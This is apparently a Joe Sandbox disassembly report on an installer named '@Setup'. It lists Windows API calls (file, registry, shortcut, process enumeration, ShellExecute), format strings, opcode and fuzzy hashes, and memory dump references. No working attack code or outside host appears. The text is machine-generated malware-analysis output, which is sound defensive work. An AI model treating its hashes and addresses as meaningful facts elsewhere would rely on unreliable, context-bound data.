                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                    Strings
                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                    • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                    • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                    • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                    • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                    • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                    • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                                    • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                    • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                    • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                    • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                    APIs
                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                    APIs
                                                                                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                    • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                    • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                    • String ID: F
                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                    • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                    • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
